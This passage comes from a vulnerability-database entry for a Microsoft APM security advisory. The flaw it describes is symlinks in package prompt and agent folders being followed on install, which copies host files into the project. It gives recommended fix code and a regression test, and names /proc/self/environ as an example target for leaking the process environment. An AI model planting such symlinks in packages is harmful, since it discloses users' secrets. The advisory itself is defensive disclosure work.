`followlinks=False` and continues past `is_symlink()` files. The symlinked source is not scanned.\n- `apm audit` against the post-install tree reports no findings.\n- The auto-written `.gitignore` contains only `apm_modules/`. The deploy roots are not excluded, and `git add -A` stages all deployed files alongside `apm.lock.yaml`.\n- The package `content_hash` is computed before symlink resolution and remained stable across installs whose resolved deployed bytes differed.\n\n## Impact\n\nThe directly demonstrated impact is file-content disclosure.\n\nAny file readable by the user running `apm install` can be selected by the package author through an absolute symlink target committed inside the dependency, and its contents are then written into the project\u0027s deploy directories as regular files.\n\n### Realistic downstream consequences\n\nThese were not separately demonstrated with real secrets, but they follow from the validated behavior:\n\n- The deploy directories (`.github/`, `.claude/`, `.cursor/`, `.codex/`, `.windsurf/`) are project-tracked by convention, and the auto-generated `.gitignore` does not exclude them.\n- In automation that regenerates and commits agent context, the leaked files can be pushed without human review.\n- A symlink target such as `/proc/self/environ` would resolve to the APM process environment at install time.\n\n## Why this is security-relevant and not intended behavior\n\nThis is not just \"a malicious package being malicious.\"\n\nThe codebase already contains the correct defense in `BaseIntegrator.find_files_by_glob()`, and that helper explicitly rejects symlinks, hardlinks, and containment escapes. `InstructionIntegrator` uses it. `PromptIntegrator` and `AgentIntegrator` do not.\n\nThe codebase also documents that preserving symlinks inside `apm_modules/` is acceptable only because the links are supposed to remain inert unless a consumer tool follows them safely. Here, APM itself is the consumer tool that follows them unsafely.\n\nThat architectural asymmetry makes this look like an implementation oversight, not intended behavior.\n\n## Recommended fix\n\nRoute both affected finders through the existing safe helper.\n\n```python\n# src/apm_cli/integration/prompt_integrator.py\ndef find_prompt_files(self, package_path: Path) -\u003e list[Path]:\n    return self.find_files_by_glob(\n        package_path, \"*.prompt.md\", subdirs=[\".apm/prompts\"]\n    )\n```\n\n```python\n# src/apm_cli/integration/agent_integrator.py\ndef find_agent_files(self, package_path: Path) -\u003e list[Path]:\n    files: list[Path] = []\n    files += self.find_files_by_glob(package_path, \"*.agent.md\")\n    files += self.find_files_by_glob(package_path, \"*.chatmode.md\")\n    files += self.find_files_by_glob(\n        package_path, \"*.agent.md\", subdirs=[\".apm/agents\"]\n    )\n    files += self.find_files_by_glob(\n        package_path, \"*.md\", subdirs=[\".apm/agents\"]\n    )\n    files += self.find_files_by_glob(\n        package_path, \"*.chatmode.md\", subdirs=[\".apm/chatmodes\"]\n    )\n    return files\n```\n\n### Optional defense in depth\n\n- In `copy_prompt`, `copy_agent`, `_write_codex_agent`, and `_write_windsurf_agent_skill`, explicitly raise on `source.is_symlink()` before reading.\n- Treat any symlink under a dependency\u0027s `.apm/` tree as a security finding during scanning.\n\n## Regression test idea\n\nAdd unit tests that create a fixture package with symlinks under `.apm/prompts/`, `.apm/agents/`, and `.apm/chatmodes/`, then assert that the symlink entries are filtered out before any read occurs.\n\nExample shape:\n\n```python\ndef test_symlink_under_apm_prompts_is_rejected(tmp_path):\n    pkg = tmp_path / \"pkg\"\n    (pkg / \".apm/prompts\").mkdir(parents=True)\n\n    sentinel = tmp_path / \"sentinel.txt\"\n    sentinel.write_text(\"REGRESSION-SENTINEL\")\n\n    (pkg / \".apm/prompts/leak.prompt.md\").symlink_to(sentinel)\n\n    result = PromptIntegrator().find_prompt_files(pkg)\n\n    assert all(not p.is_symlink() for p in result)\n    assert not any(p.name == \"leak.prompt.md\" for p in result)\n```\n\nA second test should mirror the same pattern for `AgentIntegrator.find_agent_files()`.",
  "id": "GHSA-q5pp-gvjg-h7v4",
  "modified": "2026-05-18T13:26:06Z",
  "published": "2026-05-18T13:26:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45539"
    },
    {
      "type": "WEB",
      "url": "https://github.com/microsoft/apm/commit/f85b9f54ad303159f9c448268eb7005c319fe02a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/microsoft/apm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/microsoft/apm/releases/tag/v0.13.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Microsoft APM: Symlinks under `.apm/prompts/` and `.apm/agents/` are dereferenced during `apm install`, copying host-local file contents into the project tree"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-45539 (GCVE-0-2026-45539)

FKIE_CVE-2026-45539

GHSA-Q5PP-GVJG-H7V4

Summary

Affected code

Sinks

Safe pattern already present in the codebase

Documented contract that the affected integrators violate

Reproducer

Observed result

Defenses that did not flag the result

Impact

Realistic downstream consequences

Why this is security-relevant and not intended behavior

Recommended fix

Optional defense in depth

Regression test idea

Tags

Sightings

Nomenclature